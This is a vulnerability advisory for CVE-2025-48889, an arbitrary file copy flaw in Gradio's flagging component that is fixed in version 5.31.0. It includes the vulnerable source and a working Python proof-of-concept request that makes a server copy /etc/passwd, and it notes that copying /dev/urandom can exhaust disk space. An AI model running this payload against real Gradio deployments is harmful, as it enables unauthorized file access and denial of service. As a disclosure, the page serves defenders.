Gradio Allows Unauthorized File Copy via Path Manipulation
Medium5.3CVE-2025-48889 · Published May 29, 2025 · updated Jun 5, 2026
Affected versions
| Package | Affected | Fixed in |
|---|---|---|
| gradio PyPI | < 5.31.0 | 5.31.0 |
Details and references
An arbitrary file copy vulnerability in Gradio's flagging feature allows unauthenticated attackers to copy any readable file from the server's filesystem. While attackers can't read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space. ### Description The flagging component doesn't properly validate file paths before copying files. Attackers can send specially crafted requests to the `/gradio_api/run/predict` endpoint to trigger these file copies. **Source**: User-controlled `path` parameter in the flagging functionality JSON payload **Sink**: `shutil.copy` operation in `FileData._copy_to_dir()` method The vulnerable code flow: 1. A JSON payload is sent to the `/gradio_api/run/predict` endpoint 2. The `path` field within `FileData` object can reference any file on the system 3. When processing this request, the `Component.flag()` method creates a `GradioDataModel` object 4. The `FileData._copy_to_dir()` method uses this path without proper validation: ```python def _copy_to_dir(self, dir: str) -> FileData: pathlib.Path(dir).mkdir(exist_ok=True) new_obj = dict(self) if not self.path: raise ValueError("Source file path is not set") new_name = shutil.copy(self.path, dir) # vulnerable sink new_obj["path"] = new_name return self.__class__(**new_obj) ``` 5. The lack of validation allows copying any file the Gradio process can read ### PoC The following script demonstrates the vulnerability by copying `/etc/passwd` from the server to Gradio's flagged directory: Setup a Gradio app: ```python import gradio as gr def image_classifier(inp): return {'cat': 0.2, 'dog': 0.8} test = gr.Interface(fn=image_classifier, inputs="image", outputs="label") test.launch(share=True) ``` Run the PoC: ```python import requests url = "https://[your-gradio-app-url]/gradio_api/run/predict" headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" } payload = { "data": [ { "path": "/etc/passwd", "url": "[your-gradio-app-url]", "orig_name": "network_config", "size": 5000, "mime_type": "text/plain", "meta": { "_type": "gradio.FileData" } }, {} ], "event_data": None, "fn_index": 4, "trigger_id": 11, "session_hash": "test123" } response = requests.post(url, headers=headers, json=payload) print(f"Status Code: {response.status_code}") print(f"Response Body: {response.text}") ```
- CVSS 3.1
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
- Severity from
- GitHub (reviewed advisory)
- Weakness
- CWE-434
- Also known as
- CVE-2025-48889, PYSEC-2025-119
More Gradio advisories
All Gradio| Date | Advisory | Severity | Fixed in |
|---|---|---|---|
| May 292025 | Gradio CORS Origin Validation Bypass Vulnerability CVE-2025-5320Low3.7no fix yet | Low3.7 | No fix yet |
| Mar 202025 | Gradio DOS in multipart boundry while uploading the file CVE-2024-8966High7.5no fix yet | High7.5 | No fix yet |
| Mar 202025 | Gradio Vulnerable to Open Redirect CVE-2024-8021Medium5.4no fix yet | Medium5.4 | No fix yet |
| Mar 202025 | Gradio Path Traversal vulnerability CVE-2024-12217Medium5.3no fix yet | Medium5.3 | No fix yet |
| Mar 202025 | Gradio Vulnerable to Denial of Service (DoS) via Crafted Zip Bomb CVE-2024-10569High7.5no fix yet | High7.5 | No fix yet |
| Mar 202025 | Gradio Vulnerable to Arbitrary File Deletion CVE-2024-10648High8.2no fix yet | High8.2 | No fix yet |